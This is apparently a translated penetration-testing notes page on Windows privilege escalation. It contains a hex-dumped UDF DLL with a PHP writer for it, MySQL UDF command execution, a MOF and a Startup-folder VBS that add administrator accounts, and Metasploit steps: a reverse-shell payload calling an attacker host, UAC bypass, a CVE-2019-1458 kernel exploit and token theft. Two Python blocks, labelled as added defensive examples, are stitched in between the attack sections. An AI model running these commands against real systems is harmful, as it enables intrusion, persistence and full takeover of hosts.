7369636D700000BE027374726C656E00000F003F3F3240594150415849405A0000C502737472737472000099026D656D7365740000E6027763736C656E000049005F5F4378784672616D6548616E646C65720096026D656D636D70000092015F7075726563616C6C00AD027365746C6F63616C6500DC0276737072696E74660000BA027374726370790000C1015F73747269636D7000004D53564352542E646C6C00000F015F696E69747465726D009D005F61646A7573745F6664697600000C004765744D6F64756C65426173654E616D654100000E004765744D6F64756C6546696C654E616D6545784100000400456E756D50726F636573734D6F64756C657300000500456E756D50726F6365737365730050534150492E444C4C000800575453467265654D656D6F7279000C00575453517565727953657373696F6E496E666F726D6174696F6E41000600575453456E756D657261746553657373696F6E73410057545341504933322E646C6C000057494E494E45542E646C6C0000000000000000000000000000000000BFC7514B00000000665200000100000003000000030000004852000054520000605200003314000020140000F4130000725200007852000085520000000001000200546573745544462E646C6C007368656C6C007368656C6C5F6465696E6974007368656C6C5F696E69740000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001000000D049001000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000100000140100000F30163039304E305D307330C430F630043110313F3166317C319C31A531BD31F6310F3231323B3242325A327432B332C632D532193336338733A433F833013407340D34293439349634B234C334DB34033510356D357E359D351436CD36D436DC360137373723383238623874389D38B8382B3969398D39AF39E839013A113A403A483A5D3A713A803ACE3ADF3AE53AF33AF83A063B403B503B693B723B823B8B3B9B3BA43BE43B033C123C1B3C203C263C2D3C343C4A3C533C583C5E3C653C6C3CA53CAB3CC43C333D443D683D6F3D7C3D833D9F3DFC3D013E1E3E2C3E4F3E553E803E9E3EA33EC63EEF3EF63E023F203F403F573F603F713F813F8C3F963FBF3FC53FDC3FF63FFF3F000000200000F0000000283051305830653076308E30B230D230E130F53012312C3146315D317231A431DB31EE3116323C32533268328532A832B332BE32D432F43245336D33B633BB33C233C933CF33143456345D34663475349E34A4341935413555358435AE35C335D5350C36473675369336BC36EE368B37B637F0383739E839EE39F639FD39093A123A263A6A3A713A913AD03BD63BDE3BE43BEE3B123C9A3CBA3CF63C3C3D873D953D9E3DB13DD33DDD3D013E1F3E3D3E5B3E7E3E8E3EB83ECD3ED43EF03EF63EFC3E023F423F723F783F7E3F8C3F943F9A3FA53FB23FBA3FC83FCD3FD23FD73FE23FEF3FF93F000000300000280000000E301A30203042305430B030CC30D230D830DE30E430EA30F030F63003310000004000002C00000098318039843988398C39A039A439A839AC39B039B439B839BC39C039C439843A903A0000006000000C00000014300000000000
...,CHAR))');
	if (mysql_errno($conn) != 0) {
		echo mysql_error().'<br/>';
		mysql_close($conn);
		exit();
	}
	mysql_query('select c from udftmp into dumpfile "'.$path.'"');
	if (mysql_errno($conn) != 0) {
		echo mysql_error(). '<br/>';
		mysql_query('drop table udftmp');
		mysql_close($conn);
		exit();
	}
	mysql_query('drop table udftmp');
	if (mysql_errno($conn) != 0)
		echo 'Dump DLL Failed.'.mysql_error();
	else
		echo 'Dump DLL Success!';
	mysql_close($conn);
}
?>
</body>
</html>
Manual UDF privilege escalation
  • Obtain the UDF: find the dll_ file matching the target system under sqlmap\data\udf\, copy it to sqlmap\extra\cloak\, and run the command below to recover it
    • SQLMap's bundled shells and binaries are XOR-encoded to avoid being flagged by AV, so they cannot be used as-is; decode them with SQLMap's own cloak.py
$ python cloak.py -d -i lib_mysqludf_sys.dll_
  • Find the target directory
    • MySQL < 5.1: export the UDF to the system directory c:/windows/system32/
    • MySQL > 5.1: export the UDF to lib\plugin\ under the MySQL install directory (it does not exist by default and must be created)
-- Find the MySQL directory
mysql> select @@basedir;
mysql> show variables like '%plugin%';

-- Create the directory through an NTFS ADS; with a webshell it can simply be created from the file manager
mysql> select '123' into dumpfile 'C:\\phpStudy\\MySQL\\lib::$INDEX_ALLOCATION';
mysql> select '123' into dumpfile 'C:\\phpStudy\\MySQL\\lib\\plugin::$INDEX_ALLOCATION';
  • Export the UDF: a direct upload has no permission, so write it through MySQL statements
-- On the [local] machine, read the UDF as binary and convert it to hex
mysql> select hex(load_file("C:\\udf.dll")) into dumpfile 'C:\\myudf.txt';

-- On the [target], write the UDF; here the file is named myudf.dll
mysql> select unhex('<UDF hex>') into dumpfile "C:\\Program Files\\MySQL\\lib\\plugin\\myudf.dll";

-- If a secure-file-priv error appears, edit the MySQL config file my.ini or my.cnf
-- secure_file_priv=/ # allow export to any path
  • Create the user-defined function from the UDF
mysql> create function sys_eval returns string soname 'myudf.dll';
  • Execute commands through the function
mysql> select sys_eval("whoami");

MOF privilege escalation

Prerequisites for MOF privilege escalation
  • Windows 2003 or earlier
  • The account MySQL runs as has read/write access to c:/windows/system32/wbem/mof
  • secure-file-priv is not null
How MOF privilege escalation works

MOF files are executed every five seconds, and with SYSTEM privileges. MySQL's load_file is used to write the file into /wbem/mof, after which the system runs the uploaded MOF every five seconds. Part of the MOF is a vbs script; by controlling that script's content you can make the system execute commands and escalate privileges.

  • The nullevt.mof code used is as follows:
#pragma namespace("\\\\.\\root\\subscription")
instance of __EventFilter as $EventFilter {
  EventNamespace = "Root\\Cimv2";
  Name = "filtP2";
  Query = "Select * From __InstanceModificationEvent "
  "Where TargetInstance Isa \"Win32_LocalTime\" "
  "And TargetInstance.Second = 5";
  QueryLanguage = "WQL";
};
instance of ActiveScriptEventConsumer as $Consumer {
  Name = "consPCSV2";
  ScriptingEngine = "JScript";
// executes a command: creates the user naraku
  ScriptText = "var WSH = new ActiveXObject(\"WScript.Shell\")\nWSH.run(\"net.exe user naraku 123456 /add\")";
};
instance of __FilterToConsumerBinding {
  Consumer = $Consumer;
  Filter = $EventFilter;
};
Escalation steps
  • Upload the script above to a directory with read/write permission, e.g. C:/xxx/
  • Use a SQL statement to import the file into c:/windows/system32/wbem/mof/
    • outfile cannot be used here because it appends a newline at the end, and the MOF then fails to run when treated as a binary file; use dumpfile to export a single row.
select load_file("C:/xxx/test.mof") into dumpfile "c:/windows/system32/wbem/mof/nullevt.mof";
  • Once the MOF is exported successfully it is executed right away, and the user is created every 5 seconds
Trace cleanup
  • After escalation, even if the account is deleted, the MOF recreates it within five seconds. To remove the intrusion account run:
$ net stop winmgmt
$ del c:/windows/system32/wbem/repository
$ net start winmgmt
  • Then restart the service
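As an added defensive example (not code from the original post): a small detector for the permanent WMI event subscription pattern the MOF above relies on. It parses the instance blocks and reports every __FilterToConsumerBinding whose consumer is an ActiveScriptEventConsumer or CommandLineEventConsumer; it assumes alias-style ($name) references as in that file, and the embedded sample MOF is constructed with a harmless command.

```python
"""Detect permanent WMI event subscriptions (filter -> script/command consumer)
in MOF text, e.g. files found under wbem\\mof or exported from root\\subscription."""
import re

# One "instance of Class [as $alias] { ... };" block per match.
INSTANCE_RE = re.compile(r"instance\s+of\s+(\w+)(?:\s+as\s+\$(\w+))?\s*\{(.*?)\};", re.S)
# name = "str" "str"...;  |  name = $alias;  |  name = other;
PROP_RE = re.compile(r'(\w+)\s*=\s*((?:"(?:[^"\\]|\\.)*"\s*)+|\$\w+|[^;]+);', re.S)
SCRIPT_CONSUMERS = {"ActiveScriptEventConsumer", "CommandLineEventConsumer"}


def _unescape(s):
    """Resolve MOF string escapes such as backslash-quote and backslash-n."""
    return re.sub(r"\\(.)", lambda m: {"n": "\n", "t": "\t"}.get(m.group(1), m.group(1)), s)


def parse_mof(text):
    """Return [(class_name, alias_or_None, {property: value}), ...]."""
    text = re.sub(r"(?m)^\s*//.*$", "", text)  # drop full-line comments
    instances = []
    for m in INSTANCE_RE.finditer(text):
        cls, alias, body = m.groups()
        props = {}
        for name, raw in PROP_RE.findall(body):
            raw = raw.strip()
            if raw.startswith('"'):
                # adjacent literals concatenate, exactly as in the Query above
                raw = _unescape("".join(re.findall(r'"((?:[^"\\]|\\.)*)"', raw)))
            props[name] = raw
        instances.append((cls, alias, props))
    return instances


def find_script_subscriptions(text):
    """Report each binding whose consumer executes script or commands.
    Assumes alias ($name) references, as in the nullevt.mof shown above."""
    instances = parse_mof(text)
    by_alias = {a: (c, p) for c, a, p in instances if a}
    findings = []
    for cls, _, props in instances:
        if cls != "__FilterToConsumerBinding":
            continue
        c_cls, c = by_alias.get(props.get("Consumer", "").lstrip("$"), ("?", {}))
        _, f = by_alias.get(props.get("Filter", "").lstrip("$"), ("?", {}))
        if c_cls in SCRIPT_CONSUMERS:
            findings.append({
                "consumer": c.get("Name", "?"), "consumer_class": c_cls,
                "filter": f.get("Name", "?"), "query": f.get("Query", ""),
                # the sample fires whenever the local clock's Second field is 5
                "timer_based": "Win32_LocalTime" in f.get("Query", ""),
                "payload": c.get("ScriptText") or c.get("CommandLineTemplate", ""),
            })
    return findings


# Constructed sample modelled on the nullevt.mof above, with a harmless command.
SAMPLE_MOF = r'''#pragma namespace("\\\\.\\root\\subscription")
instance of __EventFilter as $EventFilter {
  EventNamespace = "Root\\Cimv2";
  Name = "filtP2";
  Query = "Select * From __InstanceModificationEvent "
  "Where TargetInstance Isa \"Win32_LocalTime\" "
  "And TargetInstance.Second = 5";
  QueryLanguage = "WQL";
};
instance of ActiveScriptEventConsumer as $Consumer {
  Name = "consPCSV2";
  ScriptingEngine = "JScript";
  ScriptText = "var WSH = new ActiveXObject(\"WScript.Shell\")\nWSH.run(\"cmd.exe /c echo triggered\")";
};
instance of __FilterToConsumerBinding {
  Consumer = $Consumer;
  Filter = $EventFilter;
};
'''

if __name__ == "__main__":
    for hit in find_script_subscriptions(SAMPLE_MOF):
        print(f"[!] {hit['consumer_class']} '{hit['consumer']}' bound to filter "
              f"'{hit['filter']}' (timer: {hit['timer_based']})\n    {hit['payload']!r}")
```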

Startup-folder privilege escalation

  • root password is known
  • file_priv is not null
create table a (cmd text);
insert into a values ("set wshshell=createobject (""wscript.shell"") " );
insert into a values ("a=wshshell.run (""cmd.exe /c net user naraku 123456 /add"",0) " );
insert into a values ("b=wshshell.run (""cmd.exe /c net localgroup administrators naraku /add"",0) " );
select * from a into outfile "C:\\Documents and Settings\\All Users\\「开始」菜单\\程序\\启动\\a.vbs";
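As an added defensive counterpart to the UDF, MOF and startup-folder sections above (example code, not from the original post): an offline audit of the MySQL settings all three techniques rely on. The queries, the mysql.func and mysql.user tables and the secure_file_priv semantics are standard MySQL; the sample rows are constructed.

```python
"""Offline audit of the MySQL settings that the UDF, MOF and startup-folder
file-write techniques depend on. Inputs are the rows returned by AUDIT_QUERIES,
passed in as plain Python data so the check runs without a server."""
import re

# Standard MySQL queries to collect the inputs (run as an administrative user).
AUDIT_QUERIES = {
    "variables": "SHOW VARIABLES WHERE Variable_name IN "
                 "('secure_file_priv', 'plugin_dir', 'version');",
    "udfs": "SELECT name, dl FROM mysql.func;",
    "file_priv_users": "SELECT user, host FROM mysql.user WHERE File_priv = 'Y';",
}
# Functions exported by lib_mysqludf_sys, the library used in the UDF steps above.
SYS_UDF_NAMES = {"sys_eval", "sys_exec", "sys_get", "sys_set"}
SEVERITY_ORDER = {"CRITICAL": 0, "HIGH": 1, "MEDIUM": 2, "INFO": 3}


def is_fs_root(path):
    """True for '/', '\\\\' or a bare drive like 'C:\\\\' (i.e. secure_file_priv=/)."""
    stripped = path.rstrip("\\/")
    return stripped == "" or re.fullmatch(r"[A-Za-z]:", stripped) is not None


def version_tuple(version):
    """'5.0.96-community' -> (5, 0, 96)."""
    return tuple(int(p) for p in re.match(r"(\d+)\.(\d+)\.(\d+)", version).groups())


def audit_mysql(variables, udfs, file_priv_users):
    """Return (severity, message) findings, most severe first."""
    findings = []
    sfp = variables.get("secure_file_priv")  # SHOW VARIABLES reports 'NULL' when disabled
    plugin_dir = variables.get("plugin_dir", "")
    if sfp == "NULL":
        pass  # LOAD_FILE / INTO DUMPFILE are disabled: the write steps above cannot work
    elif not sfp or is_fs_root(sfp):
        findings.append(("HIGH", "secure_file_priv allows INTO DUMPFILE to any path, "
                                 "including plugin_dir, wbem\\mof and Startup folders"))
    elif plugin_dir.lower().startswith(sfp.lower()):
        findings.append(("HIGH", f"secure_file_priv={sfp!r} still contains plugin_dir, "
                                 "so a UDF library can be dropped there"))
    if version_tuple(variables.get("version", "0.0.0")) < (5, 1, 0):
        findings.append(("MEDIUM", "MySQL < 5.1 loads UDF libraries from the system "
                                   "directory rather than plugin_dir; upgrade"))
    for name, dl in udfs:
        sev = "CRITICAL" if name.lower() in SYS_UDF_NAMES else "INFO"
        findings.append((sev, f"registered UDF {name} from {dl}; confirm it is expected"))
    for user, host in file_priv_users:
        if (user, host) != ("root", "localhost"):
            findings.append(("MEDIUM", f"{user}@{host} holds FILE privilege; revoke it "
                                       "unless file import/export is really needed"))
    return sorted(findings, key=lambda f: SEVERITY_ORDER[f[0]])


# Constructed sample resembling the lab setup described above (not real data).
SAMPLE_VARIABLES = {"secure_file_priv": "", "version": "5.5.53",
                    "plugin_dir": "C:\\phpStudy\\MySQL\\lib\\plugin\\"}
SAMPLE_UDFS = [("sys_eval", "myudf.dll")]
SAMPLE_FILE_PRIV = [("root", "localhost"), ("webapp", "%")]

if __name__ == "__main__":
    for query in AUDIT_QUERIES.values():
        print("--", query)
    for sev, msg in audit_mysql(SAMPLE_VARIABLES, SAMPLE_UDFS, SAMPLE_FILE_PRIV):
        print(f"[{sev}] {msg}")
```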

MSSQL

  • Prerequisite: obtain the SA password

Exploitation methods

  • Classic xp_cmdshell
    • how to restore xp_cmdshell if it has been removed
  • Execute commands through COM components
  • Execute commands through CLR (similar to MySQL UDF)
  • Local hash injection plus port forwarding/Socks to reach the target's internal MSSQL without a password
  • Use a Windows access token to reach the target's internal MSSQL without a password

Oracle

  • The Oracle service normally runs with very high privileges
  • Various automated exploitation modules in MSF

MSF privilege escalation

  • Note the context in which each command below is run
    • $: Linux command line
    • msf: inside the MSF console
    • meterpreter: inside a session
# Generate the payload and place it on the target
$ msfvenom -p windows/meterpreter_reverse_tcp lhost=<attacker IP> lport=<attacker listening port> -f exe -o /tmp/win.exe
# Listen on the attacker machine
$ msfconsole
msf> use exploit/multi/handler
msf> set payload windows/meterpreter_reverse_tcp
msf> set lhost <attacker IP>
msf> set lport <attacker port>
msf> exploit
# Run it on the target; the attacker's MSF receives the reverse shell, then run the shell command in MSF
meterpreter> shell
C:\Users\Naraku\Desktop>whoami
naraku-win7\naraku
# If Chinese text is garbled, run
# C:\Users\Naraku\Desktop>chcp 65001

GetSystem

  • Run getsystem directly
meterpreter> getsystem

BypassUAC

  • Related modules
    • use exploit/windows/local/bypassuac
    • use exploit/windows/local/bypassuac_injection
    • use windows/local/bypassuac_vbs
    • use windows/local/ask
meterpreter> background  # background the session
msf> use exploit/windows/local/bypassuac
msf> set SESSION <session_id>
# backgrounding prints the session_id; if unsure, use sessions -l
msf> run

Kernel exploits

# Query installed patches
meterpreter> run post/windows/gather/enum_patches
[+] KB2999226 installed on 11/25/2020
[+] KB976902 installed on 11/21/2010
  • local_exploit_suggester can also be used to find which exploits may apply.
# Query exploits
msf> use post/multi/recon/local_exploit_suggester
msf> set LHOST <attacker IP>
msf> set SESSION <session_id>
msf> run

I ran every exploit found in the previous step and none succeeded; looking again, the cause was the architecture: Meterpreter was running as a 32-bit process while the system is 64-bit.

  • So process migration is needed: move Meterpreter into a 64-bit process.
meterpreter> sysinfo         # check the architecture
meterpreter> ps              # list processes
meterpreter> migrate <PID>   # migrate into a process

Repeat the local_exploit_suggester step; it now lists 64-bit exploits

  • Here the relatively recent CVE_2019_1458 is chosen
msf> use exploit/windows/local/cve_2019_1458_wizardopium
msf> set SESSION <session_id>
msf> run
meterpreter> getuid
Server username: NT AUTHORITY\SYSTEM

Token manipulation

  • incognito token impersonation
meterpreter> use incognito
meterpreter> list_tokens -u                          # list available tokens
meterpreter> impersonate_token 'NT AUTHORITY\SYSTEM' # impersonate the SYSTEM token
meterpreter> execute -f cmd.exe -i -t                # -t runs with the impersonated token
meterpreter> rev2self                                # revert to the original token
  • steal_token
meterpreter> ps                 # list processes
meterpreter> steal_token <PID>  # steal the token of the given process
meterpreter> drop_token         # drop the stolen token

SMB RCE family

Almost extinct in practice

  • MS08-067
  • MS17-010
